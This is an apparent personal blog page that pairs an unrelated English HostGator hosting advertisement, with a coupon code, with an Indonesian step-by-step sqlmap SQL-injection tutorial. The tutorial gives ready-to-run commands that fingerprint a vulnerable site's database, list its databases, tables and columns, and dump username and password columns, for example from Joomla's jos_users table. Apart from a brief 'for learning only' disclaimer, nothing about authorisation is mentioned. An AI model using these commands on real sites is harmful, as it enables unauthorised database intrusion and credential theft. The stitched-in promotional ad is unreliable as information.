r0ckm3n-blog

 

Hostgator web hosting is one of the best to date. with a variety of features offered for the convenience of its customers, HostGator web hosting become world class. Since its establishment in 2002, HostGator has been a world-leading provider of web hosting service. Although Their headquarters is in Houston, Texas, They provide top-notch service to clients from over 200 countries internationally with their staff of over 750 employees. They offer Shared, Reseller, VPS, and Dedicated server packages for both beginners and professionals alike. Each of their shared Web Hosting plans includes 24/7/365 support, a 99.9% uptime guarantee, and a 45-day money-back guarantee. If you would like to learn more, please visit the company page , nothing to lose when you rent hosting at HostGator.

• Unlimited space
• Unlimited bandwidth
• Easy Control Panel
• 1-Click Script Installs
• $100 Google AdWords Offer
• 4,500 Free Website Templates
• 99.9% Uptime Guarantee
• 45 Day Money Back Guarantee
• 24/7/365 Technical Support

the cost is quite cheap, you can get comfort in developing your website.
now get 25% off discount by using coupon code SEPTEMBERCODE for each web hosting package.

Buat yang ga tau sqlmap, sqlmap software berbasis text untuk penetrasi lewat sql, biasanya disebut sql injection / sqli yang bisa di jalankan di windows/linux. Untuk di windows silahkan install dulu python nya.

oke sekarang kita mulai tutornya..

*WARNING :INI HANYA UNTUK PEMBELAJARAN, PENGGUNAAN ATAS TANGGUNG JAWAB SENDIRI

pertama jangan pengen instan bos,,,
misalnya dengan memasukan perintah langsung kaya gini:
./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump
jarang berhasil,.

mending ikutin scan target cara newbie, kita pecah perintah diatas jadi beberapa bagian:

1. fethcing banner <<untuk membuat route injection, dengan metode tebak-tebakan untuk menemukan dbms (database management system) contoh:mysql, oracle, etc.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --banner

2. fetching user <<analisis user yang ada pada dbms,injection akan lebih mudah karena telah terpetakan oleh perintah pertama
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --current-user --current-db

3. fetching database <<untuk me list daftar database
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --dbs

4. fetching table <<untuk mengetahui table yang ada pada database yang telah kita ketahui sebelumnya.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb --tables


seperti ini kira-kira tampilan table databasenya..


5. fetching kolom <<untuk mengetahui isi column dari table yang kita tentukan
perintah : ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab --columns

nah kalo yang ini tampilan column nya


6. terakhir fetching isi kolom << melihat isi data column nya :D
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab -C username,password --dump


ket:
URL    = web yang ada bug sqli contoh www.target.com/index.php?id=2
X      = maksimum injection kalo ga salah ganti aja 10 misalnya
namadb = nama database yang ingin di ketahui
tab    = tabel yang ingin kita buka misal jos_users untuk joomla (tergantung dari database)

username,password = tergantung dari table yang kita dapat

untuk melihat hasil dumpnya, buka folder sqlmqp - output - www.target.com - dump

oke, sekian dulu deh :)
r0ckm3n